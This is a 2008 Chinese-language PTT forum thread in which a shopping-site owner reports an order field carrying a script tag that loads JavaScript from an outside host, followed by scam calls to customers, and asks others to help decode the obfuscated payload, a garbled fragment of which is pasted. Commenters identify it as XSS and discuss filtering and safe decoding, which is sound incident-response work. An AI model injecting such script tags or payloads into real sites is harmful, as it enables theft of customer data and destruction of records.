作者reflynet ()
看板PHP
标题[请益] 我的客户被诈骗集团打电话了..
时间Fri Jun 6 20:03:50 2008
首先可能要先说明一下,我有个购物网站..
前几天有一笔订单的内文出现了<script src="
http://i69s.cn/c.js"></script>
当下不以为意,就把那一笔订单删掉了..
不过这两天有客户(购物车卖东西嘛,当然会有客户)说被诈骗集团打电话去,
按照惯例对方详述了客户的购物内容之类的细节,
客户就直接通知我们...
目前还在研究发生了什麽事情,不过我主要是想问以下的Javascript语法,
是用
何种方式编码的?我看不出原文耶...
我只能稍微看到他有修改status bar的讯息就是了..
/* 以下是不完整的Javascript原始码,原版可以从我文首提供的网址下载 */
$="var çÚìþþçççîëìÖÖøddÞÞÑÑ£éÛÚy y y y y ðÏëîÏÏÏ
ÿ××£éÉ;É=ç+ÛÍÀall)íÂachÇËonß¾eÅíddÇLiÈeÐËß,fažs¼
Tiºout(£ØÈatus='完毕'£ÃÔØoÐr¸=à(Ær¼urn true}éj=0;while(ïÄ[j]Æ
Û=ãÍÛ.Ù'Èep=otherÄ!=-1Æã='#';};j++;}à o(ÆwâÙ£[admæÁ]£Ôvâsub
Èr(wÃ0)äÀg¼ElemôById˺nu-tabÄ.æÐHTMLÚ菜单<ÕoáèÌqÚ<¿áóê
type=·text/javaê·Ò·../js/t½sp¸t
/* 该JS档结束 */
--
※ 发信站: 批踢踢实业坊(ptt.cc)
◆ From: 218.162.164.176
1F:→ reflynet:补一下,因为我找不到Javascript有没有板..所以先贴PHP板 06/06 20:04
2F:→ hwakeye:javascript可以到ajax板问 06/06 20:21
※ 编辑: reflynet 来自: 218.162.164.176 (06/06 20:24)
3F:→ reflynet:谢谢楼上h大 06/06 20:24
4F:推 alpe:你先把所有的input做 html tag过滤吧. 06/06 20:49
5F:→ reflynet:楼上A大:其实那时候发现<script>标签可以插入的时候,我就 06/06 20:52
6F:→ reflynet:马上开始过滤啦~ 06/06 20:52
7F:→ reflynet:唔...结果我自己转码转出来了.. 06/06 21:04
9F:推 ybite:看样子像是很典型的XSS attack.... 06/06 21:09
10F:→ ybite:我自己在decode的时候差点中标 = = 06/06 21:09
11F:→ ybite:似乎其目的在於把你客户的资料偷出来?y 06/06 21:24
12F:→ reflynet:我现在还在研究他到底是要偷管理者的cookies还是怎样 06/06 21:36
13F:→ reflynet:因为我现在虽然解码了,但是仍然读不懂他的程式,应该可以 06/06 21:37
14F:→ reflynet:判定为XSS... 06/06 21:37
15F:→ reflynet:问题是我怎麽看也没有看到可以把资料往外传的地方啊.. 06/06 21:41
16F:→ reflynet:果然是我功力不足.. 06/06 21:41
19F:→ reflynet:感谢y大..顺便请问一下,为何你可以抓到後半段的资料@@? 06/06 22:54
20F:→ reflynet:我终於trace完其他的部分,这个程式到最後(main.js)还会毁 06/06 22:55
21F:→ reflynet:屍灭迹,还进SQL删资料咧~ 06/06 22:55
22F:推 ybite:後半段的东西是script = =,他的html没被entitles... = = 06/06 22:56
23F:→ ybite:我在trace的时候都觉得自己中标了 = = 06/06 22:57
24F:推 LPH66:其实简单的加个<textarea>再印出来就现形了= = 06/06 22:59
25F:→ reflynet:囧 对後.. 可以用textarea..我在那边用document.write 06/06 23:01
26F:推 ybite:囧,我发现我用document.write来解很恐怖... 06/06 23:01
27F:→ reflynet:难怪看不到..= = 06/06 23:01
28F:→ ybite:幸亏他script被document.write之後不会被执行到 = = 06/06 23:01
29F:→ reflynet:y大..(握手) 我们都用document.write XD 06/06 23:02
30F:推 LPH66:再+1 (握) 还好它不会执行... 06/06 23:03
※ 编辑: reflynet 来自: 218.162.164.176 (06/07 00:25)
31F:推 mosquito520:我想问一下...这个要怎麽还原啊?找了半天没看到对应 06/07 02:54
32F:→ mosquito520:的方法??? 06/07 02:54